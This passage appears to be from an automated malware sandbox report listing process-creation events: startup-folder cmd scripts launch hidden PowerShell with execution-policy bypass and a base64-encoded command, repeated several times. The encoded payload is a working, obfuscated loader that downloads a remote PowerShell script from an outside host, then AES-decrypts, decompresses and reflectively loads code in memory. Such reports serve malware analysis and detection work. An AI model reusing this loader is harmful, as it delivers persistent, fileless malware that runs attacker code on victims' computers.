GZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_56945484.cmd" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_be60077b.cmd" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_76fbe4d0.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a2f15e19.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2090f8f2.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0